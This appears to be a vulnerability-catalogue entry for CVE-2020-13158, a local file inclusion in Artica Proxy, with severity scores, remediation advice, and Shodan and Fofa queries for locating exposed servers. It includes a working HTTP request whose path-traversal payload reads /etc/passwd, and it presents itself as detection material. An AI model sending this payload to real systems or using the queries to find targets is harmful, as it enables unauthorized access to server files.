🔙 목록으로 돌아가기

CVE-2020-13158: Artica Proxy Community Edition <4.30.000000 - Local File Inclusion

TitleArtica Proxy Community Edition <4.30.000000 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.
RemediationUpgrade to Artica Proxy Community Edition version 4.30.000000 or later to fix the Local File Inclusion vulnerability.
CVSS Score7.5
EPSS Score0.92333
CVE IDCVE-2020-13158
CWE IDCWE-22
Shodan Queryhttp.html:"artica"
Fofa Querybody="artica"
Tags cve cve2020 artica lfi articatech vkev vuln

🔍 Vulnerability Description

Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter.

🌐 HTTP Request

GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-13158.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-13158.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A